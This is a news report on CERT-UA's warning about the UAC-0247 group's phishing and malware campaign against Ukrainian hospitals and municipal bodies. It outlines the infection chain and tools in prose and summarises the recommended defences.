Ukraine Warns of Surge in Cyberattacks on Hospitals, Local Governments by UAC-0247 Hackers

The ongoing conflict in Ukraine has turned the digital battlefield into a critical front, with state‑aligned and criminal groups exploiting the chaos to strike essential services. Recent data from CERT‑UA shows a sharp rise in attacks between March and April 2026 targeting hospitals, emergency responders, and municipal administrations. By masquerading as humanitarian aid offers, the UAC‑0247 threat cluster leverages the heightened trust of war‑time relief efforts, turning ordinary phishing emails into gateways for sophisticated malware. This surge underscores how geopolitical instability can amplify cyber risk for civilian infrastructure.

UAC‑0247’s infection chain is deliberately layered. A phishing link delivers a compressed archive containing a malicious shortcut (LNK) that invokes Windows utilities such as mshta.exe to execute remote code. Subsequent stages drop custom loaders, inject code into legitimate processes like RuntimeBroker.exe, and establish encrypted reverse shells resembling ‘RAVENSHELL.’ Persistence is achieved with the C# backdoor AGINGFLY, which dynamically pulls command logic from remote servers, and a PowerShell helper called SILENTLOOP that fetches C2 addresses, sometimes via Telegram channels. The toolkit also includes credential‑stealing utilities (CHROMELEVATOR, ZAPIXDESK) and tunneling tools for lateral movement.

The breadth of the campaign has practical implications for Ukrainian and allied organizations. Beyond data theft, attackers have embedded XMRIG cryptocurrency miners in compromised WireGuard binaries, revealing a dual motive of financial gain. CERT‑UA advises disabling high‑risk file types (LNK, HTA, JavaScript) and restricting native Windows tools like PowerShell and mshta.exe, while emphasizing network segmentation and multi‑factor authentication to curb lateral spread. As the conflict endures, the episode serves as a warning that cyber‑espionage and profit‑driven crime will continue to converge on critical public services worldwide.